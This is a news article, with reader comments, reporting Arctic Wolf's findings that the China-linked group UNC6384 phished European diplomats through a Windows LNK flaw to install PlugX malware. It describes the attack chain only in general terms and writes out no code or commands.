NewKerala.com

China-Linked Hackers Target Europe: New Windows Flaw Exposes Diplomats

A China-linked hacking group has been targeting European diplomatic missions using a new Windows vulnerability. The attackers sent phishing emails disguised as official European Commission and NATO meeting invitations. When clicked, these deployed sophisticated PlugX malware that gives hackers complete control over infected systems. Cybersecurity experts warn this campaign aligns with China's intelligence-gathering objectives regarding European defense cooperation.

Key Points: China Hackers UNC6384 Target European Diplomats via Windows Flaw

  • UNC6384 exploited unpatched Windows LNK vulnerability CVE-2025-9491 across European nations
  • Hackers used diplomatic-themed phishing emails about NATO and EU meetings
  • Attack chain deployed PlugX malware enabling full system control and data theft
  • Malware evolved rapidly from 700KB to just 4KB for better stealth
3 min read

China-linked hackers target European diplomatic missions using new Windows flaw

China-linked hackers UNC6384 exploit Windows LNK flaw to target European diplomatic missions with PlugX malware, reveals Arctic Wolf cybersecurity report.

"The continued targeting of European diplomatic entities highlights China's growing cyber espionage focus - Arctic Wolf"

New Delhi, Nov 2

A China-linked hacking group named UNC6384 has been blamed for a new cyberattack campaign targeting European diplomatic and government organisations, according to a report by cybersecurity firm Arctic Wolf.

The attacks took place between September and October 2025, exploiting an unpatched Windows shortcut (LNK) vulnerability, reported by The Hacker News.

The victims of the attack include diplomatic organizations in Hungary, Belgium, Italy, and the Netherlands, as well as government agencies in Serbia.

Arctic Wolf said the hackers used spear-phishing emails containing links that appeared related to European Commission meetings, NATO workshops, and diplomatic coordination events.

When victims clicked the links, they were led to malicious LNK files designed to exploit the Windows flaw, tracked as CVE-2025-9491 with a CVSS score of 7.0.

Once opened, these files launched a complex attack chain that ended with the deployment of PlugX malware, a dangerous remote access trojan also known by names like Destroy RAT, Korplug, and SOGU.

The malware allows hackers to control infected systems, record keystrokes, upload or download files, and gather detailed information from the compromised computers.

Researchers explained that the LNK files trigger a PowerShell command that extracts a hidden archive containing three files -- a legitimate Canon printer utility, a malicious DLL file called CanonStager, and an encrypted PlugX payload.

The hackers use a technique called DLL side-loading to make the malware look like a harmless programme.

The CanonStager malware has been evolving rapidly. Arctic Wolf found that its file size had dropped from 700 KB in early September to just 4 KB by October 2025, showing that the hackers are working to make it smaller, stealthier, and harder to detect.

In some cases, the attackers also used HTML Application (HTA) files that loaded external JavaScript from cloudfront[.]net domains to deliver the malware.

This shows that UNC6384 continues to refine its methods to stay ahead of security defences.

Cybersecurity researchers have also linked UNC6384 to another China-based hacking group known as Mustang Panda, known for targeting government and diplomatic entities across Europe and Asia.

The group has been seen deploying memory-resident versions of PlugX, referred to as SOGU.SEC.

Experts say the campaign aligns with China's intelligence-gathering goals, particularly to monitor European defense cooperation, policy coordination, and alliance strength.

Microsoft has confirmed that its Defender antivirus can detect and block this type of attack, while Smart App Control adds another protection layer by blocking malicious files downloaded from the internet.

According to Arctic Wolf, the continued targeting of European diplomatic entities highlights China's growing cyber espionage focus on understanding the inner workings of European alliances and defence strategies.

- IANS

Share this article:

Reader Comments

R
Rohit P
The file size dropping from 700KB to just 4KB in a month is terrifying! Shows how quickly these hackers are evolving. Our cybersecurity teams in India need to stay several steps ahead. Maybe we should invest more in indigenous security solutions rather than depending only on foreign software.
A
Arjun K
Not surprised at all. China has been consistently targeting strategic information globally. Remember how they targeted Indian power grids and defense networks? This is their standard modus operandi. European countries are finally waking up to what we've been facing for years.
S
Sarah B
Working in cybersecurity in Delhi, I appreciate the detailed technical breakdown. The DLL side-loading technique using Canon printer utility is clever but dangerous. Organizations need better employee training - no clicking suspicious links, even if they look official!
V
Vikram M
While China's cyber aggression is concerning, I wish our media would also highlight India's own cybersecurity capabilities. We have excellent white-hat hackers and security researchers who are doing great work. Let's not always portray ourselves as victims.
M
Michael C
The timing is interesting - right when Europe is strengthening its defense cooperation. China clearly wants to monitor these developments closely. India should use this opportunity to strengthen cybersecurity partnerships with European nations. 🤝
A
Ananya R

We welcome thoughtful discussions from our readers. Please keep comments respectful and on-topic.

Leave a Comment

Minimum 50 characters 0/50